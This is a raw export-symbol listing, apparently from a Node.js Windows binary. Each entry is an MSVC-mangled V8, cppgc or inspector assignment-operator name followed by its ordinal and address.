                                                                                                                                                                                                        ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16310x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@V?$Handle@VObject@internal@v8@@@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16320x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16330x140078ac0
                                                                                                                                                                                                        ??4?$BaseShape@VString@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16340x140078ac0
                                                                                                                                                                                                        ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16350x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16360x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16370x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16380x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16390x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16400x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16410x140078b00
                                                                                                                                                                                                        ??4?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16420x140078b00
                                                                                                                                                                                                        ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16430x140078ac0
                                                                                                                                                                                                        ??4?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16440x140078ac0
                                                                                                                                                                                                        ??4?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16450x140078ac0
                                                                                                                                                                                                        ??4?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16460x140078ac0
                                                                                                                                                                                                        ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16470x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16480x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16490x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16500x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16510x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16520x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16530x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16540x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16550x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16560x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16570x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16580x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16590x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16600x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16610x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16620x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16630x140078b00
                                                                                                                                                                                                        ??4?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16640x140078b00
                                                                                                                                                                                                        ??4?$HeapVisitor@VMarkingVerifierBase@internal@cppgc@@@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z16650x140078ac0
                                                                                                                                                                                                        ??4?$HeapVisitor@VMarkingVerifierBase@internal@cppgc@@@internal@cppgc@@QEAAAEAV012@AEBV012@@Z16660x140078ac0
                                                                                                                                                                                                        ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@$$QEAU012@@Z16670x14047eef0
                                                                                                                                                                                                        ??4?$MagicNumbersForDivision@I@base@v8@@QEAAAEAU012@AEBU012@@Z16680x140079fe0
                                                                                                                                                                                                        ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@$$QEAU012@@Z16690x1410ee4c0
                                                                                                                                                                                                        ??4?$MagicNumbersForDivision@_K@base@v8@@QEAAAEAU012@AEBU012@@Z16700x140079760
                                                                                                                                                                                                        ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16710x140078ac0
                                                                                                                                                                                                        ??4?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16720x140078ac0
                                                                                                                                                                                                        ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16730x140078ac0
                                                                                                                                                                                                        ??4?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16740x140078ac0
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@$$QEAV01@@Z16750x140079770
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBD@v8@@QEAAAEAV01@AEBV01@@Z16760x140079760
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@$$QEAV01@@Z16770x140079770
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBE@v8@@QEAAAEAV01@AEBV01@@Z16780x140079760
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAAAEAV01@$$QEAV01@@Z16790x140079770
                                                                                                                                                                                                        ??4?$MemorySpan@$$CBVCFunction@v8@@@v8@@QEAAAEAV01@AEBV01@@Z16800x140079760
                                                                                                                                                                                                        ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16810x140078b00
                                                                                                                                                                                                        ??4?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16820x140078b00
                                                                                                                                                                                                        ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16830x140078b00
                                                                                                                                                                                                        ??4?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16840x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16850x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAAEAV012@AEBV012@@Z16860x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16870x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAAEAV012@AEBV012@@Z16880x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16890x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAAEAV012@AEBV012@@Z16900x140078b00
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16910x140078ac0
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16920x140078ac0
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16930x140078ac0
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16940x140078ac0
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16950x140078ac0
                                                                                                                                                                                                        ??4?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@QEAAAEAV012@AEBV012@@Z16960x140078ac0
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16970x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z16980x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16990x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17000x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17010x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17020x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17030x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17040x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17050x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17060x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17070x140078b00
                                                                                                                                                                                                        ??4?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17080x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17090x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17100x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@V423@@Z17110x140078b40
                                                                                                                                                                                                        ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17120x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17130x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@V423@@Z17140x140078b40
                                                                                                                                                                                                        ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@$$QEAV0123@@Z17150x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAV0123@AEBV0123@@Z17160x140078b00
                                                                                                                                                                                                        ??4?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@V423@@Z17170x140078b40
                                                                                                                                                                                                        ??4?$TorqueGeneratedFactory@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17180x140078ac0
                                                                                                                                                                                                        ??4?$TorqueGeneratedFactory@VFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17190x140078ac0
                                                                                                                                                                                                        ??4?$TorqueGeneratedFactory@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17200x140078ac0
                                                                                                                                                                                                        ??4?$TorqueGeneratedFactory@VLocalFactory@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17210x140078ac0
                                                                                                                                                                                                        ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17220x1404bad70
                                                                                                                                                                                                        ??4?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAAAEAV012@AEBV012@@Z17230x1404bad90
                                                                                                                                                                                                        ??4?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAAAEAV01@$$QEAV01@@Z17240x14047e3e0
                                                                                                                                                                                                        ??4?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAAEAV01@AEBV01@@Z17250x14047e420
                                                                                                                                                                                                        ??4?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAAAEAV01@AEBV01@@Z17260x140078ac0
                                                                                                                                                                                                        ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@$$QEAV01@@Z17270x1404bad70
                                                                                                                                                                                                        ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@AEBV01@@Z17280x1404bad90
                                                                                                                                                                                                        ??4?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAV01@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@@Z17290x1404badb0
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z17300x14007c470
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z17310x14007be70
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@@Z17320x14007bdf0
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@$$QEAV01@@Z17330x14007b3e0
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@AEBV01@@Z17340x14007ac80
                                                                                                                                                                                                        ??4?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAV01@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@@Z17350x14007ac50
                                                                                                                                                                                                        ??4AccessorPair@debug@v8@@QEAAAEAV012@$$QEAV012@@Z17360x140078ac0
                                                                                                                                                                                                        ??4AccessorPair@debug@v8@@QEAAAEAV012@AEBV012@@Z17370x140078ac0
                                                                                                                                                                                                        ??4AccessorSignature@v8@@QEAAAEAV01@$$QEAV01@@Z17380x140078ac0
                                                                                                                                                                                                        ??4AccessorSignature@v8@@QEAAAEAV01@AEBV01@@Z17390x140078ac0
                                                                                                                                                                                                        ??4ActivityControl@v8@@QEAAAEAV01@AEBV01@@Z17400x140078ac0
                                                                                                                                                                                                        ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17410x140752520
                                                                                                                                                                                                        ??4AddressToTraceMap@internal@v8@@QEAAAEAV012@AEBV012@@Z17420x140752570
                                                                                                                                                                                                        ??4AlignedSlotAllocator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17430x1404bade0
                                                                                                                                                                                                        ??4AlignedSlotAllocator@internal@v8@@QEAAAEAV012@AEBV012@@Z17440x140079760
                                                                                                                                                                                                        ??4AllocationHandle@cppgc@@QEAAAEAV01@$$QEAV01@@Z17450x140078ac0
                                                                                                                                                                                                        ??4AllocationHandle@cppgc@@QEAAAEAV01@AEBV01@@Z17460x140078ac0
                                                                                                                                                                                                        ??4AllocationProfile@v8@@QEAAAEAV01@AEBV01@@Z17470x140078ac0
                                                                                                                                                                                                        ??4Allocator@ArrayBuffer@v8@@QEAAAEAV012@AEBV012@@Z17480x140078ac0
                                                                                                                                                                                                        ??4Array@v8@@QEAAAEAV01@$$QEAV01@@Z17490x140078ac0
                                                                                                                                                                                                        ??4Array@v8@@QEAAAEAV01@AEBV01@@Z17500x140078ac0
                                                                                                                                                                                                        ??4ArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z17510x140078ac0
                                                                                                                                                                                                        ??4ArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z17520x140078ac0
                                                                                                                                                                                                        ??4ArrayBufferAllocator@node@@QEAAAEAV01@$$QEAV01@@Z17530x140078ac0
                                                                                                                                                                                                        ??4ArrayBufferAllocator@node@@QEAAAEAV01@AEBV01@@Z17540x140078ac0
                                                                                                                                                                                                        ??4ArrayBufferView@v8@@QEAAAEAV01@$$QEAV01@@Z17550x140078ac0
                                                                                                                                                                                                        ??4ArrayBufferView@v8@@QEAAAEAV01@AEBV01@@Z17560x140078ac0
                                                                                                                                                                                                        ??4AsmJsScanner@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17570x140636320
                                                                                                                                                                                                        ??4AsmJsScanner@internal@v8@@QEAAAEAV012@AEBV012@@Z17580x140636480
                                                                                                                                                                                                        ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17590x140078ac0
                                                                                                                                                                                                        ??4AsmType@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17600x140078ac0
                                                                                                                                                                                                        ??4AssemblerOptions@internal@v8@@QEAAAEAU012@$$QEAU012@@Z17610x14049b6f0
                                                                                                                                                                                                        ??4AssemblerOptions@internal@v8@@QEAAAEAU012@AEBU012@@Z17620x140079900
                                                                                                                                                                                                        ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17630x140078ac0
                                                                                                                                                                                                        ??4AstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17640x140078ac0
                                                                                                                                                                                                        ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@$$QEAV012@@Z17650x140078ac0
                                                                                                                                                                                                        ??4AtomicsWaitWakeHandle@Isolate@v8@@QEAAAEAV012@AEBV012@@Z17660x140078ac0
                                                                                                                                                                                                        ??4BackingStore@v8@@QEAAAEAV01@AEBV01@@Z17670x140078ac0
                                                                                                                                                                                                        ??4BackupIncumbentScope@Context@v8@@QEAAAEAV012@AEBV012@@Z17680x140079900
                                                                                                                                                                                                        ??4BaseObjectSizeTrait@internal@cppgc@@QEAAAEAU012@$$QEAU012@@Z17690x140078ac0
                                                                                                                                                                                                        ??4BaseObjectSizeTrait@internal@cppgc@@QEAAAEAU012@AEBU012@@Z17700x140078ac0
                                                                                                                                                                                                        ??4BigInt64Array@v8@@QEAAAEAV01@$$QEAV01@@Z17710x140078ac0
                                                                                                                                                                                                        ??4BigInt64Array@v8@@QEAAAEAV01@AEBV01@@Z17720x140078ac0
                                                                                                                                                                                                        ??4BigInt@v8@@QEAAAEAV01@$$QEAV01@@Z17730x140078ac0
                                                                                                                                                                                                        ??4BigInt@v8@@QEAAAEAV01@AEBV01@@Z17740x140078ac0
                                                                                                                                                                                                        ??4BigIntObject@v8@@QEAAAEAV01@$$QEAV01@@Z17750x140078ac0
                                                                                                                                                                                                        ??4BigIntObject@v8@@QEAAAEAV01@AEBV01@@Z17760x140078ac0
                                                                                                                                                                                                        ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17770x140078b00
                                                                                                                                                                                                        ??4BigIntToI32PairDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z17780x140078b00
                                                                                                                                                                                                        ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17790x140078b00
                                                                                                                                                                                                        ??4BigIntToI64Descriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z17800x140078b00
                                                                                                                                                                                                        ??4BigUint64Array@v8@@QEAAAEAV01@$$QEAV01@@Z17810x140078ac0
                                                                                                                                                                                                        ??4BigUint64Array@v8@@QEAAAEAV01@AEBV01@@Z17820x140078ac0
                                                                                                                                                                                                        ??4Binary@protocol@v8_inspector@@QEAAAEAV012@$$QEAV012@@Z17830x1400aadb0
                                                                                                                                                                                                        ??4Binary@protocol@v8_inspector@@QEAAAEAV012@AEBV012@@Z17840x1400b5850
                                                                                                                                                                                                        ??4BitVector@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17850x1404bae00
                                                                                                                                                                                                        ??4Bitmap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17860x140078ac0
                                                                                                                                                                                                        ??4Bitmap@internal@v8@@QEAAAEAV012@AEBV012@@Z17870x140078ac0
                                                                                                                                                                                                        ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17880x140078ac0
                                                                                                                                                                                                        ??4BitsetType@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17890x140078ac0
                                                                                                                                                                                                        ??4BlockData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z17900x14047e5f0
                                                                                                                                                                                                        ??4BodyDescriptor@SwissNameDictionary@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17910x140078ac0
                                                                                                                                                                                                        ??4BodyDescriptor@SwissNameDictionary@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17920x140078ac0
                                                                                                                                                                                                        ??4Boolean@v8@@QEAAAEAV01@$$QEAV01@@Z17930x140078ac0
                                                                                                                                                                                                        ??4Boolean@v8@@QEAAAEAV01@AEBV01@@Z17940x140078ac0
                                                                                                                                                                                                        ??4BooleanObject@v8@@QEAAAEAV01@$$QEAV01@@Z17950x140078ac0
                                                                                                                                                                                                        ??4BooleanObject@v8@@QEAAAEAV01@AEBV01@@Z17960x140078ac0
                                                                                                                                                                                                        ??4BranchHintMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17970x14047e620
                                                                                                                                                                                                        ??4BranchHintMap@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17980x14047e6c0
                                                                                                                                                                                                        ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17990x140079920
                                                                                                                                                                                                        ??4BranchMatcher@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18000x140079900
                                                                                                                                                                                                        ??4BreakLocation@debug@v8@@QEAAAEAV012@$$QEAV012@@Z18010x14047e820
                                                                                                                                                                                                        ??4BreakLocation@debug@v8@@QEAAAEAV012@AEBV012@@Z18020x140079760
                                                                                                                                                                                                        ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18030x14047e840
                                                                                                                                                                                                        ??4ByteData@PreparseDataBuilder@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18040x140079a50
                                                                                                                                                                                                        ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18050x140078ac0
                                                                                                                                                                                                        ??4BytecodeDecoder@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18060x140078ac0
                                                                                                                                                                                                        ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18070x140528100
                                                                                                                                                                                                        ??4BytecodeIterator@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18080x140528100
                                                                                                                                                                                                        ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18090x1408f2f70
                                                                                                                                                                                                        ??4BytecodeJumpTable@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18100x140079900
                                                                                                                                                                                                        ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18110x1408f0ad0
                                                                                                                                                                                                        ??4BytecodeLabel@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18120x140079760
                                                                                                                                                                                                        ??4BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18130x140f91c60
                                                                                                                                                                                                        ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18140x140078b00
                                                                                                                                                                                                        ??4BytecodeLoopHeader@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18150x140078b00
                                                                                                                                                                                                        ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18160x1408f9820
                                                                                                                                                                                                        ??4BytecodeNode@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18170x140079a00
                                                                                                                                                                                                        ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18180x140078ac0
                                                                                                                                                                                                        ??4Bytecodes@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18190x140078ac0
                                                                                                                                                                                                        ??4CFunction@v8@@QEAAAEAV01@$$QEAV01@@Z18200x140079770
                                                                                                                                                                                                        ??4CFunction@v8@@QEAAAEAV01@AEBV01@@Z18210x140079760
                                                                                                                                                                                                        ??4CPU@base@v8@@QEAAAEAV012@$$QEAV012@@Z18220x140e620c0
                                                                                                                                                                                                        ??4CPU@base@v8@@QEAAAEAV012@AEBV012@@Z18230x140e62200
                                                                                                                                                                                                        ??4CallDescriptors@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18240x140078ac0
                                                                                                                                                                                                        ??4CallDescriptors@internal@v8@@QEAAAEAV012@AEBV012@@Z18250x140078ac0
                                                                                                                                                                                                        ??4CallInterfaceDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z18260x140078b00
                                                                                                                                                                                                        ??4Channel@V8Inspector@v8_inspector@@QEAAAEAV012@AEBV012@@Z18270x140078ac0
                                                                                                                                                                                                        ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18280x14049b740
                                                                                                                                                                                                        ??4CodeCommentsIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18290x140079900
